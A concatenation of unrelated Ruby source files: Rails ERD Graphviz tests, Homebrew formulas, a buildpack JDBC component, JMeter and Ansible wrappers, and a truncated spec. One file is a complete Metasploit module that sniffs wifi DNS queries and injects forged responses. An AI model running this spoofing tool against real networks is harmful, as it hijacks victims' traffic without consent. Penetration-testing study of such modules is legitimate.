test "create should write to file with dot extension without requiring graphviz" do
create_simple_domain
begin
GraphViz.class_eval do
alias_method :old_output_and_errors_from_command, :output_and_errors_from_command
undef :output_and_errors_from_command
def output_and_errors_from_command(*args); raise end
end
assert_nothing_raised do
Diagram::Graphviz.create(:filetype => :dot)
end
ensure
GraphViz.class_eval do
undef :output_and_errors_from_command
alias_method :output_and_errors_from_command, :old_output_and_errors_from_command
end
end
end
test "create should create output for domain with attributes if orientation is vertical" do
create_model "Foo", :bar => :references, :column => :string do
belongs_to :bar
end
create_model "Bar", :column => :string
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:orientation => :vertical)
end
test "create should create output for domain if orientation is vertical" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:orientation => :vertical)
end
test "create should not create output if there are no connected models" do
Diagram::Graphviz.create rescue nil
assert !File.exist?("erd.png")
end
test "create should abort and complain if there are no connected models" do
message = nil
begin
Diagram::Graphviz.create
rescue => e
message = e.message
end
assert_match(/No entities found/, message)
end
test "create should abort and complain if output directory does not exist" do
message = nil
begin
create_simple_domain
Diagram::Graphviz.create(:filename => "does_not_exist/foo")
rescue => e
message = e.message
end
assert_match(/Output directory 'does_not_exist' does not exist/, message)
end
test "create should not fail when reserved words are used as node names" do
create_model "Node", :name => :string
create_model "Edge", :node => :references do
belongs_to :node
end
assert_nothing_raised do
Diagram::Graphviz.create
end
end
# Graphviz output ==========================================================
test "generate should create directed graph" do
create_simple_domain
assert_equal "digraph", diagram.graph.type
end
test "generate should add title to graph" do
create_simple_domain
assert_equal '"Domain model\n\n"', diagram.graph.graph[:label].to_s
end
test "generate should add default value for splines attribute" do
create_simple_domain
assert_equal '"spline"', diagram.graph.graph[:splines].to_s
end
test "generate should add set value for splines attribute" do
create_simple_domain
assert_equal '"ortho"', diagram(splines: 'ortho').graph.graph[:splines].to_s
end
test "generate should add title with application name to graph" do
begin
Object::Quux = Module.new
Object::Quux::Application = Class.new
Object::Rails = Struct.new(:application).new(Object::Quux::Application.new)
create_simple_domain
assert_equal '"Quux domain model\n\n"', diagram.graph.graph[:label].to_s
ensure
Object::Quux.send :remove_const, :Application
Object.send :remove_const, :Quux
Object.send :remove_const, :Rails
end
end
test "generate should omit title if set to false" do
create_simple_domain
assert_equal "", diagram(:title => false).graph.graph[:label].to_s
end
test "generate should create node for each entity" do
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar"
assert_equal ["m_Bar", "m_Foo"], find_dot_nodes(diagram).map(&:id).sort
end
test "generate should add html label for entities" do
RailsERD.options.markup = true
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar"
assert_match %r{<\w+.*?>Bar</\w+>}, find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should add record label for entities" do
RailsERD.options.markup = false
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar"
assert_equal %Q("{Bar}"), find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should add attributes to entity html labels" do
RailsERD.options.markup = true
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar", :column => :string
assert_match %r{<\w+.*?>column <\w+.*?>string</\w+.*?>}, find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should add attributes to entity record labels" do
RailsERD.options.markup = false
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar", :column => :string, :column_two => :boolean
assert_equal %Q("{Bar|column (string)\\ncolumn_two (boolean)\\n}"), find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should not add any attributes to entity labels if attributes is set to false" do
create_model "Jar", :contents => :string
create_model "Lid", :jar => :references do
belongs_to :jar
end
assert_no_match %r{contents}, find_dot_node(diagram(:attributes => false), "m_Jar")[:label].to_gv
end
test "node html labels should have direction reversing braces for horizontal orientation" do
RailsERD.options.markup = true
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A<\{\s*<.*\|.*>\s*\}>\Z)m, find_dot_node(diagram(:orientation => :horizontal), "m_Author")[:label].to_gv
end
test "node html labels should not have direction reversing braces for vertical orientation" do
RailsERD.options.markup = true
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A<\s*<.*\|.*>\s*>\Z)m, find_dot_node(diagram(:orientation => :vertical), "m_Author")[:label].to_gv
end
test "node record labels should have direction reversing braces for horizontal orientation" do
RailsERD.options.markup = false
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A"\{\w+\|.*\}"\Z)m, find_dot_node(diagram(:orientation => :horizontal), "m_Author")[:label].to_gv
end
test "node record labels should not have direction reversing braces for vertical orientation" do
RailsERD.options.markup = false
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A"\w+\|.*"\Z)m, find_dot_node(diagram(:orientation => :vertical), "m_Author")[:label].to_gv
end
test "generate should create edge for each relationship" do
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar", :foo => :references do
belongs_to :foo
end
assert_equal [["m_Bar", "m_Foo"], ["m_Foo", "m_Bar"]], find_dot_node_pairs(diagram).sort
end
test "generate should create edge to polymorphic entity if polymorphism is true" do
create_model "Cannon", :defensible => :references do
belongs_to :defensible, :polymorphic => true
end
create_model "Stronghold" do
has_many :cannons, :as => :defensible
end
create_model "Galleon" do
has_many :cannons, :as => :defensible
end
assert_equal [["m_Defensible", "m_Cannon"], ["m_Defensible", "m_Galleon"], ["m_Defensible", "m_Stronghold"]],
find_dot_node_pairs(diagram(:polymorphism => true)).sort
end
test "generate should create edge to each child of polymorphic entity if polymorphism is false" do
create_model "Cannon", :defensible => :references do
belongs_to :defensible, :polymorphic => true
end
create_model "Stronghold" do
has_many :cannons, :as => :defensible
end
create_model "Galleon" do
has_many :cannons, :as => :defensible
end
assert_equal [["m_Galleon", "m_Cannon"], ["m_Stronghold", "m_Cannon"]], find_dot_node_pairs(diagram).sort
end
test "generate should create edge to abstract entity if polymorphism is true" do
create_model "Person", :settlement => :references
create_model "Country" do
has_many :settlements
end
create_model "Settlement" do
self.abstract_class = true
belongs_to :country
has_many :people
end
create_model "City", Settlement, :country => :references
assert_equal [["m_Country", "m_Settlement"], ["m_Settlement", "m_City"], ["m_Settlement", "m_Person"]],
find_dot_node_pairs(diagram(:polymorphism => true)).sort
end
test "generate should create edge to each child of abstract entity if polymorphism is false" do
create_model "Person", :settlement => :references
create_model "Country" do
has_many :settlements
end
create_model "Settlement" do
self.abstract_class = true
belongs_to :country
has_many :people
end
create_model "City", Settlement, :country => :references
assert_equal [["m_City", "m_Person"], ["m_Country", "m_City"]], find_dot_node_pairs(diagram).sort
end
# Simple notation style ====================================================
test "generate should use no style for one to one cardinalities with simple notation" do
create_one_to_one_assoc_domain
assert_equal [["none", "none"]], find_dot_edge_styles(diagram(:notation => :simple))
end
test "generate should use normal arrow head for one to many cardinalities with simple notation" do
create_one_to_many_assoc_domain
assert_equal [["none", "normal"]], find_dot_edge_styles(diagram(:notation => :simple))
end
test "generate should use normal arrow head and tail for many to many cardinalities with simple notation" do
create_many_to_many_assoc_domain
assert_equal [["normal", "normal"]], find_dot_edge_styles(diagram(:notation => :simple))
end
# Advanced notation style ==================================================
test "generate should use open dots for one to one cardinalities with bachman notation" do
create_one_to_one_assoc_domain
assert_equal [["odot", "odot"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use dots for mandatory one to one cardinalities with bachman notation" do
create_one_to_one_assoc_domain
One.class_eval do
validates_presence_of :other
end
assert_equal [["dot", "odot"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and open dot head with dot tail for one to many cardinalities with bachman notation" do
create_one_to_many_assoc_domain
assert_equal [["odot", "odotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and dot head for mandatory one to many cardinalities with bachman notation" do
create_one_to_many_assoc_domain
One.class_eval do
validates_presence_of :many
end
assert_equal [["dot", "odotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and open dot head and tail for many to many cardinalities with bachman notation" do
create_many_to_many_assoc_domain
assert_equal [["odotnormal", "odotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and dot tail and head for mandatory many to many cardinalities with bachman notation" do
create_many_to_many_assoc_domain
Many.class_eval do
validates_presence_of :more
end
More.class_eval do
validates_presence_of :many
end
assert_equal [["dotnormal", "dotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
# Crows-foot notation style ================================================
test "generate should use 0/1 crowsfeet for one to one cardinalities with crowsfoot notation" do
create_one_to_one_assoc_domain
assert_equal [["teeodot", "teeodot"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 1/1 crowsfeet for mandatory one to one cardinalities with crowsfoot notation" do
create_one_to_one_assoc_domain
One.class_eval do
validates_presence_of :other
end
assert_equal [["teeodot","teetee"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 0/* crowsfeet with 0/1 crowsfeet for one to many cardinalities with crowsfoot notation" do
create_one_to_many_assoc_domain
assert_equal [["teeodot", "crowodot"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 0/* crowsfeet with 1/1 crowsfett for mandatory one to many cardinalities with crowsfoot notation" do
create_one_to_many_assoc_domain
One.class_eval do
validates_presence_of :many
end
assert_equal [["teeodot", "crowtee"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 0/* and 0/* crowsfeet for many to many cardinalities with crowsfoot notation" do
create_many_to_many_assoc_domain
assert_equal [["crowodot", "crowodot"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 1/* and 1/* tail and head for mandatory many to many cardinalities with crowsfoot notation" do
create_many_to_many_assoc_domain
Many.class_eval do
validates_presence_of :more
end
More.class_eval do
validates_presence_of :many
end
assert_equal [["crowtee", "crowtee"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
end
| 35.151899 | 129 | 0.691634 |
6ae0b313dd9dec34ca20ca33db601bf41b39157d | 260 |
# Be sure to restart your server when you modify this file.
# Add new mime types for use in respond_to blocks:
# Mime::Type.register "text/richtext", :rtf
# Mime::Type.register_alias "text/html", :iphone
Mime::Type.register "application/vnd.ms-excel", :xls
| 28.888889 | 59 | 0.738462 |
e23c9c15960e3cabf0135ce8376a7dcc8c519e84 | 629 | class FontD2coding < Formula
version "1.3.2,20180524"
sha256 "0f1c9192eac7d56329dddc620f9f1666b707e9c8ed38fe1f988d0ae3e30b24e6"
url "https://github.com/naver/d2codingfont/releases/download/VER#{version.to_s.sub(/,.*/, "")}/D2Coding-Ver#{version.to_s.sub(/,.*/, "")}-#{version.to_s.sub(/.*,/, "")}.zip"
desc "D2 Coding"
homepage "https://github.com/naver/d2codingfont"
def install
parent = File.dirname(Dir.pwd) != (ENV['HOMEBREW_TEMP'] || '/tmp') ? '../' : ''
(share/"fonts").install "#{parent}D2Coding/D2Coding-Ver#{version.to_s.sub(/,.*/, "")}-#{version.to_s.sub(/.*,/, "")}.ttc"
end
test do
end
end
| 44.928571 | 175 | 0.655008 |
b9c445981fee14e7879c609e349e6e39369840fc | 970 | class Detekt < Formula
desc "Static code analysis for Kotlin"
homepage "https://github.com/detekt/detekt"
url "https://jcenter.bintray.com/io/gitlab/arturbosch/detekt/detekt-cli/1.9.1/detekt-cli-1.9.1-all.jar"
sha256 "42937cb0284e2b8af99901bd9debde0c15899c06732cb350f0617885f445b5dd"
bottle :unneeded
depends_on "openjdk"
def install
libexec.install "detekt-cli-#{version}-all.jar"
(bin/"detekt").write <<~EOS
#!/bin/bash
exec "#{Formula["openjdk"].opt_bin}/java" -jar "#{libexec}/detekt-cli-#{version}-all.jar" "$@"
EOS
end
test do
(testpath/"input.kt").write <<~EOS
fun main() {
}
EOS
(testpath/"detekt.yml").write <<~EOS
empty-blocks:
EmptyFunctionBlock:
active: true
EOS
system bin/"detekt", "--input", "input.kt", "--report", "txt:output.txt", "--config", "detekt.yml"
assert_equal "EmptyFunctionBlock", shell_output("cat output.txt").slice(/\w+/)
end
end
| 28.529412 | 105 | 0.651546 |
1c4a347a24cb29a7ae821c565dab53dff0f26594 | 1,703 | # frozen_string_literal: true
# Cloud Foundry Java Buildpack
# Copyright 2013-2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'fileutils'
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/framework'
module JavaBuildpack
module Framework
# Encapsulates the functionality for enabling the Postgres JDBC client.
class PostgresqlJDBC < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_jar
@droplet.additional_libraries << (@droplet.sandbox + jar_name)
end
# (see JavaBuildpack::Component::BaseComponent#release)
def release
@droplet.additional_libraries << (@droplet.sandbox + jar_name)
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
service? && !driver?
end
private
def driver?
(@application.root + '**/postgresql-*.jar').glob.any?
end
def service?
@application.services.one_service?(/postgres/, 'uri')
end
end
end
end
| 28.864407 | 81 | 0.715208 |
ed61266a9ecdd8c5e59757e0d7bf43ea7cbe22e6 | 668 | module Gridinit
module Jmeter
class DSL
def simple_config_element(params={}, &block)
node = Gridinit::Jmeter::SimpleConfigElement.new(params)
attach_node(node, &block)
end
end
class SimpleConfigElement
attr_accessor :doc
include Helper
def initialize(params={})
params[:name] ||= 'SimpleConfigElement'
@doc = Nokogiri::XML(<<-EOS.strip_heredoc)
        <ConfigTestElement guiclass="SimpleConfigGui" testclass="ConfigTestElement" testname="#{params[:name]}" enabled="true"/>
EOS
update params
update_at_xpath params if params[:update_at_xpath]
end
end
end
end
| 24.740741 | 121 | 0.655689 |
1c7e1bbaa35b5fa08b4b851013b9f884d790ada9 | 3,247 | # frozen_string_literal: true
# See LICENSE.txt at root of repository
# GENERATED FILE - DO NOT EDIT!!
require 'ansible/ruby/modules/base'
module Ansible
module Ruby
module Modules
# Manages BIG-IQ applications used for load balancing an HTTPS application on port 443 with SSL offloading on BIG-IP.
class Bigiq_application_https_offload < Base
# @return [String] Name of the new application.
attribute :name
validates :name, presence: true, type: String
# @return [String, nil] Description of the application.
attribute :description
validates :description, type: String
# @return [Array<Hash>, Hash, nil] A list of servers that the application is hosted on.,If you are familiar with other BIG-IP setting, you might also refer to this list as the list of pool members.,When creating a new application, at least one server is required.
attribute :servers
validates :servers, type: TypeGeneric.new(Hash)
# @return [Hash, nil] Settings to configure the virtual which will receive the inbound connection.,This virtual will be used to host the HTTPS endpoint of the application.,Traffic destined to the C(redirect_virtual) will be offloaded to this parameter to ensure that proper redirection from insecure, to secure, occurs.
attribute :inbound_virtual
validates :inbound_virtual, type: Hash
# @return [Hash, nil] Settings to configure the virtual which will receive the connection to be redirected.,This virtual will be used to host the HTTP endpoint of the application.,Traffic destined to this parameter will be offloaded to the C(inbound_virtual) parameter to ensure that proper redirection from insecure, to secure, occurs.
attribute :redirect_virtual
validates :redirect_virtual, type: Hash
# @return [Object, nil] Specifies the SSL profile for managing client-side SSL traffic.
attribute :client_ssl_profile
# @return [String, nil] Specifies the name of service environment or the hostname of the BIG-IP that the application will be deployed to.,When creating a new application, this parameter is required.
attribute :service_environment
validates :service_environment, type: String
# @return [Symbol, nil] Collects statistics of the BIG-IP that the application is deployed to.,This parameter is only relevant when specifying a C(service_environment) which is a BIG-IP; not an SSG.
attribute :add_analytics
validates :add_analytics, type: Symbol
# @return [:absent, :present, nil] The state of the resource on the system.,When C(present), guarantees that the resource exists with the provided attributes.,When C(absent), removes the resource from the system.
attribute :state
validates :state, expression_inclusion: {:in=>[:absent, :present], :message=>"%{value} needs to be :absent, :present"}, allow_nil: true
# @return [Boolean, nil] If the module should wait for the application to be created, deleted or updated.
attribute :wait
validates :wait, expression_inclusion: {:in=>[true, false], :message=>"%{value} needs to be true, false"}, allow_nil: true
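        # Illustrative construction (not part of the generated file; the values
        # below are made up and the Base initializer is assumed to accept an
        # attribute hash, as with the other generated modules):
        #
        #   Bigiq_application_https_offload.new(
        #     name: 'store-front',
        #     service_environment: 'bigip-01.example.com',
        #     servers: [{ 'address' => '10.0.0.5', 'port' => 80 }],
        #     state: :present
        #   )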
end
end
end
end
| 61.264151 | 344 | 0.724361 |
28eefcd4fb22c2cb67b7c3836c0a490a64cd6dca | 121 | class PfeedDelivery < ActiveRecord::Base
belongs_to :pfeed_receiver, :polymorphic => true
belongs_to :pfeed_item
end
| 24.2 | 50 | 0.793388 |
abd8b1182ef6c7806dbc7e08f719d93df440dfd5 | 254 | # typed: true
class CreateWizards < ActiveRecord::Migration[6.0]
def change
create_table :wizards do |t|
t.string :name
t.integer :house
t.string :parent_email
t.text :notes
t.timestamps null: false
end
end
end
| 18.142857 | 50 | 0.641732 |
f8f550e79b252dcf885926c0bee643ddb41f078f | 1,754 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = true
# Configure static file server for tests with Cache-Control for performance.
config.serve_static_files = true
config.static_cache_control = 'public, max-age=3600'
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Randomize the order test cases are executed.
config.active_support.test_order = :random
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
end
| 40.790698 | 85 | 0.775371 |
28fe6033851945b7f4a5d2f75815780a3737ebda | 338 | class CreateTowingTractorDockerContainers < ActiveRecord::Migration[5.1]
def change
create_table :towing_tractor_docker_containers do |t|
t.integer :image_id
t.integer :server_id
t.string :container_id
t.text :env
t.text :cmd
t.timestamp :last_keepalived_at
t.timestamps
end
end
end
| 22.533333 | 72 | 0.695266 |
61a68e5b5e35f177a237891e65400f4317c9bfed | 3,474 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'yaml'
require 'net/dns/packet'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DNSpwn DNS Hijack',
'Description' => %q{
        Race legitimate DNS responses and answer sniffed DNS queries with spoofed records
},
'Author' => ['dragorn'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement",
File.join(Msf::Config.install_root, "data", "exploits", "wifi", "dnspwn", "dnslist.yml")
]),
OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]),
OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]),
OptString.new('IP', [ true, "IP for host resolution", "1.2.3.4" ]),
OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]),
OptString.new('MATCH', [ true, "Match for DNS name replacement", "(.*)"]),
], self.class)
end
def run
@dnslist = datastore['DNSLIST']
@regex = datastore['MATCH']
@response = datastore['IP']
@filter = datastore['FILTER']
@duration = datastore['DURATION']
@useyaml = datastore['USEDNSFILE']
@dns = []
if @useyaml
begin
@dns = YAML::load_file(@dnslist)
rescue ::Exception => e
print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
end
else
@dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration }
end
@run = true
open_wifi
self.wifi.filter = @filter if not @filter.empty?
each_packet do |pkt|
d3 = pkt.dot3
next if not d3
p = PacketFu::Packet.parse(d3) rescue nil
next unless p.is_udp?
dns = Net::DNS::Packet::parse(p.payload) rescue nil
next unless dns
next if dns.answer.size != 0
next if dns.question.size == 0
@dns.each do |r|
hit = nil
r['regex'].each do |reg|
hit = dns.question[0].qName.scan(/#{reg}/) || nil
break if hit.size != 0
end
next if hit.size.zero?
print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ])
injpkt = Lorcon::Packet.new()
injpkt.bssid = pkt.bssid
response_pkt = PacketFu::UDPPacket.new
response_pkt.eth_daddr = p.eth_saddr
response_pkt.eth_saddr = p.eth_daddr
response_pkt.ip_saddr = p.ip_daddr
response_pkt.ip_daddr = p.ip_saddr
response_pkt.ip_ttl = p.ip_ttl
response_pkt.udp_sport = p.udp_dport
response_pkt.udp_dport = p.udp_sport
dns.header.qr = 1
dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"])
response_pkt.payload = dns.data
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
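     # Send the forged reply in the opposite DS direction to the captured
     # query, so it follows the path a genuine response would take.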
if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS)
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS)
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
else
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
end
self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error)
end
end
end
end
| 28.243902 | 133 | 0.64882 |
d58fce28b1d961572bb649f790bac376d470db39 | 137 | # frozen_string_literal: true
# :nodoc:
class ApplicationController < ActionController::Base
before_action :authenticate_account!
end
| 19.571429 | 52 | 0.817518 |
3363bf1a4d498244eabb9d5e13bd491a56029b1b | 103 | $LOAD_PATH.unshift File.expand_path("../lib", __dir__)
require "tictactoe"
require "minitest/autorun"
| 20.6 | 54 | 0.76699 |
1cec3374f7aba915205157aeb4a39688fc03bc42 | 117 | Rp::AvailableReport.seed(:id,
{id: 1, code: 'report 1'},
{id: 2, code: 'report 2'},
{id: 3, code: 'report 3'}
) | 23.4 | 29 | 0.555556 |
bf9f376cd9622ba1b24aca1e03999512938e468e | 791 | Pod::Spec.new do |s|
s.name = 'ZLPhotoBrowser'
s.version = '2.5.1'
s.summary = 'A simple way to multiselect photos from ablum, force touch to preview photo, support portrait and landscape, edit photo, multiple languages(Chinese,English,Japanese)'
s.homepage = 'https://github.com/longitachi/ZLPhotoBrowser'
s.license = 'MIT'
s.platform = :ios
s.author = {'longitachi' => '[email protected]'}
s.ios.deployment_target = '8.0'
s.source = {:git => 'https://github.com/longitachi/ZLPhotoBrowser.git', :tag => s.version}
s.source_files = 'PhotoBrowser/*.{h,m}'
s.resources = 'PhotoBrowser/resource/*.{png,xib,nib,bundle}'
s.requires_arc = true
s.frameworks = 'UIKit','Photos','PhotosUI'
s.dependency 'SDWebImage'
end
| 39.55 | 186 | 0.656131 |
e9b8cf26861fa2af333f7320227dea33dd81d56f | 449 | # frozen_string_literal: true
require 'simplecov'
SimpleCov.start do
add_filter '/test/'
enable_coverage :branch
end
$LOAD_PATH.unshift File.expand_path('../lib', __dir__)
require 'hollaback'
require 'minitest/autorun'
class Callbacker
attr_reader :name
def initialize(name)
@name = name
end
def say(&_block)
puts yield
end
def say_hello
puts 'hello'
end
def say_goodbye
puts "goodbye-#{name}"
end
end
| 13.205882 | 54 | 0.701559 |
5d78b794e59ec4192dea7e2a5bd8eaf162f1e2fa | 172 | # frozen_string_literal: true
require "rails_helper"
RSpec.describe ApplicationBatch, type: :batch do
it { is_expected.to inherit_from BatchProcessor::BatchBase }
end
| 19.111111 | 62 | 0.796512 |
e22d33941533ef79058c630e9f723ca2ac9fb44d | 2,316 | require File.expand_path('../helper', __FILE__)
begin
require 'coffee-script'
require 'execjs'
begin
ExecJS.compile '1'
rescue Exception
raise LoadError, 'unable to execute JavaScript'
end
class CoffeeTest < Test::Unit::TestCase
def coffee_app(options = {}, &block)
mock_app do
set :views, File.dirname(__FILE__) + '/views'
set(options)
get('/', &block)
end
get '/'
end
it 'renders inline Coffee strings' do
coffee_app { coffee "alert 'Aye!'\n" }
assert ok?
assert body.include?("alert('Aye!');")
end
it 'defaults content type to javascript' do
coffee_app { coffee "alert 'Aye!'\n" }
assert ok?
assert_equal "application/javascript;charset=utf-8", response['Content-Type']
end
it 'defaults allows setting content type per route' do
coffee_app do
content_type :html
coffee "alert 'Aye!'\n"
end
assert ok?
assert_equal "text/html;charset=utf-8", response['Content-Type']
end
it 'defaults allows setting content type globally' do
coffee_app(:coffee => { :content_type => 'html' }) do
coffee "alert 'Aye!'\n"
end
assert ok?
assert_equal "text/html;charset=utf-8", response['Content-Type']
end
it 'renders .coffee files in views path' do
coffee_app { coffee :hello }
assert ok?
assert_include body, "alert(\"Aye!\");"
end
it 'ignores the layout option' do
coffee_app { coffee :hello, :layout => :layout2 }
assert ok?
assert_include body, "alert(\"Aye!\");"
end
it "raises error if template not found" do
mock_app {
get('/') { coffee :no_such_template }
}
assert_raise(Errno::ENOENT) { get('/') }
end
it "passes coffee options to the coffee engine" do
coffee_app { coffee "alert 'Aye!'\n", :no_wrap => true }
assert ok?
assert_body "alert('Aye!');"
end
it "passes default coffee options to the coffee engine" do
mock_app do
set :coffee, :no_wrap => true # default coffee style is :nested
get('/') { coffee "alert 'Aye!'\n" }
end
get '/'
assert ok?
assert_body "alert('Aye!');"
end
end
rescue LoadError
warn "#{$!.to_s}: skipping coffee tests"
rescue
if $!.class.name == 'ExecJS::RuntimeUnavailable'
warn "#{$!.to_s}: skipping coffee tests"
else
raise
end
end
| 23.876289 | 81 | 0.639465 |
b98ff0bf53a1294747d27d39732d6450ccda69bd | 1,059 | require 'json'
require 'octokit'
module Gitload
module Sources
class GitHub
include Source
def initialize config, options = {}
@config = config
::Octokit.configure do |c|
c.auto_paginate = true
c.access_token = options.fetch :access_token, ENV['GITLOAD_GITHUB_TOKEN']
end
end
def repos
puts 'Loading GitHub projects...'
data = @config.load_or_cache_data 'github' do
Utils.stringify_keys ::Octokit.repositories.collect(&:to_attrs)
end
data.collect{ |d| Repo.new d }
end
class Repo < Gitload::Repo
def initialize api_data
super :github, api_data
@name = api_data['name']
@owner = api_data['owner']['login']
@owner_type = api_data['owner']['type']
@fork = api_data['fork']
@clone_urls[:git] = api_data['git_url']
@clone_urls[:ssh] = api_data['ssh_url']
@clone_urls[:http] = api_data['clone_url']
end
end
end
end
end
| 23.021739 | 83 | 0.574127 |
79f6a05e88405cf6121c4c58434dec7e3d7e174e | 466 | cask 'folx' do
version '4.2.13332'
sha256 '5664c147dc0b848a2705659a206b02293e4b97f13dc1b5976a6e3435f1c41708'
url "http://www.eltima.com/download/folx-update/downloader_mac_#{version}.dmg"
appcast 'http://mac.eltima.com/download/folx-updater/folx.xml',
:checkpoint => '5842b05fba51144ad903c431987cb91de8876703065f3ab6801e2de0f7eb2a88'
name 'Folx'
homepage 'http://mac.eltima.com/download-manager.html'
license :freemium
app 'Folx.app'
end
| 33.285714 | 91 | 0.76824 |
f8f26bcb47ec8030dd4f789e45aa74f0ade99f17 | 442 | # frozen_string_literal: true
module RDF
module Serializers
class ListSerializer
include RDF::Serializers::ObjectSerializer
def hextuples_for_collection
@resource.map do |resource|
RDF::Serializers.serializer_for(resource).record_hextuples(resource, nil, @includes, @params)
end.flatten(1)
end
class << self
def validate_includes!(_includes); end
end
end
end
end
| 22.1 | 103 | 0.676471 |
1a9b354fbc5894669cfab1f8ead7a35146358390 | 659 | # frozen_string_literal: true
class Reviewable < ActiveRecord::Base
class Collection
class Item
include ActiveModel::Serialization
attr_reader :id
def initialize(id)
@id = id
end
end
def initialize(reviewable, guardian, args = nil)
args ||= {}
@reviewable, @guardian, @args = reviewable, guardian, args
@content = []
end
def has?(id)
@content.any? { |a| a.id.to_s == id.to_s }
end
def blank?
@content.blank?
end
def present?
!blank?
end
def each
@content.each { |i| yield i }
end
def to_a
@content
end
end
end
| 15.690476 | 64 | 0.564492 |
39a04162d9f9f79adefe31b8efef9d7e6093e5eb | 503 | require 'spec_helper'
describe 'Google Chrome' do
before(:all) do
@selenium = Selenium::WebDriver.for(:remote, url: "http://localhost:4444/wd/hub", desired_capabilities: :chrome)
end
after(:all) do
@selenium.quit
end
res = '1366 x 768'
it "should return display resolution of #{res}" do
@selenium.get 'http://www.whatismyscreenresolution.com/'
element = @selenium.find_element(:id, 'resolutionNumber')
expect(element.text).to eq(res)
end
end unless ENV['APPVEYOR']
| 25.15 | 116 | 0.695825 |
8776861672b168aa9f17ca356d60fb871547f2f5 | 376 | module Intouch::Protocols
class Base
def handle_update(update)
raise NotImplementedError
end
def send_regular_notification(issue, state)
raise NotImplementedError
end
protected
def need_group_message?(journal)
journal.blank? || (journal.details.pluck(:prop_key) & %w[priority_id status_id project_id]).present?
end
end
end
| 20.888889 | 106 | 0.712766 |
f8e56b5ac4b4a4adbf2225c49ee3570539723b60 | 851 |
require_relative 'conway_cubes'
describe 'ConwayCube', :day17 do
def with_data(file_path)
cur_dir = File.dirname(__FILE__)
f = File.open(File.join(cur_dir, file_path))
